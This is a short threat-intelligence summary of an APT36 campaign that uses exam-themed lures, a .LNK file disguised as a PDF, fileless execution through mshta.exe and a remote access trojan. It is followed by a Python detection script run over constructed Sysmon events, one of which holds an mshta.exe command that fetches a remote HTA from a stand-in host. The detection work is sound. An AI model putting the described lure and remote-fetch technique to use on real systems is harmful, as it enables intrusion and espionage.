A cyber espionage campaign attributed to APT36 has evolved to include sophisticated, fileless malware delivered through deceptive exam-related notifications. This campaign uses trusted Windows tools and adaptive tactics to evade detection and conduct espionage activities against targeted organizations. #APT36 #TransparentTribe
Key points
- The attack exploits a seemingly benign notification about a Japanese language exam to deliver malware.
- The malware campaign uses a weaponized Windows shortcut (.LNK) file disguised as a PDF to initiate infection.
- It leverages legitimate Windows tools like mshta.exe for fileless, memory-resident execution to evade detection.
- The malware adapts its behavior based on detected antivirus software, enhancing persistence and stealth.
- Once active, it functions as a Remote Access Trojan, enabling surveillance, data theft, and remote control of infected systems.
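The two observable steps above, a double-extension shortcut posing as a document and mshta.exe launched from the shell with a remote stage, can be matched in endpoint telemetry. The following is an added detection example, not code from the original report; it runs over constructed events in a Sysmon-like shape (Event ID 1 process creation, Event ID 11 file creation), and the paths, hostnames and file names in it are made up.

```python
"""Flag the LNK-to-mshta.exe chain in Sysmon-style telemetry (added example, constructed events)."""
import re

# Constructed events in a Sysmon-like shape: ID 1 = process create, ID 11 = file create.
EVENTS = [
    {"EventID": 11, "Image": r"C:\Program Files\Mail\mail.exe",
     "TargetFilename": r"C:\Users\alice\Downloads\JLPT_Exam_Notice.pdf.lnk"},
    {"EventID": 1, "Image": r"C:\Windows\System32\mshta.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'"C:\Windows\System32\mshta.exe" https://lure.example.invalid/notice.hta'},
    {"EventID": 1, "Image": r"C:\Windows\System32\mshta.exe",
     "ParentImage": r"C:\Program Files\Vendor\setup.exe",
     "CommandLine": r'"C:\Windows\System32\mshta.exe" "C:\Program Files\Vendor\help.hta"'},
    {"EventID": 11, "Image": r"C:\Windows\explorer.exe",
     "TargetFilename": r"C:\Users\alice\Desktop\Budget.xlsx"},
]

DOUBLE_EXT_LNK = re.compile(r"\.(pdf|docx?|xlsx?|pptx?)\.lnk$", re.I)
REMOTE_ARG = re.compile(r"\b(https?|ftp)://", re.I)
INLINE_SCRIPT = re.compile(r"\b(vbscript|javascript):", re.I)


def classify(event: dict) -> list:
    """Return the reasons an event matches the lure/execution pattern (empty if none)."""
    reasons = []
    if event["EventID"] == 11:
        # A downloaded "document" whose real extension is .lnk is the lure itself.
        if DOUBLE_EXT_LNK.search(event["TargetFilename"]):
            reasons.append("double-extension .lnk masquerading as a document")
        return reasons
    if event["EventID"] == 1 and event["Image"].lower().endswith("mshta.exe"):
        cmd = event["CommandLine"]
        # Shell-spawned mshta.exe is what a user double-clicking a shortcut looks like.
        if event["ParentImage"].lower().endswith("explorer.exe"):
            reasons.append("mshta.exe spawned by explorer.exe")
        # A remote URL or inline script means no payload file has to touch disk.
        if REMOTE_ARG.search(cmd):
            reasons.append("mshta.exe fetching a remote HTA (fileless stage)")
        if INLINE_SCRIPT.search(cmd):
            reasons.append("mshta.exe running inline script")
    return reasons


def scan(events) -> dict:
    """Map the index of each flagged event to its reasons; benign events are omitted."""
    hits = {}
    for i, e in enumerate(events):
        r = classify(e)
        if r:
            hits[i] = r
    return hits
```

The vendor installer that runs a local .hta under its own parent (event index 2) is deliberately left unflagged, so the rule keys on the parent process and the remote stage rather than on mshta.exe alone.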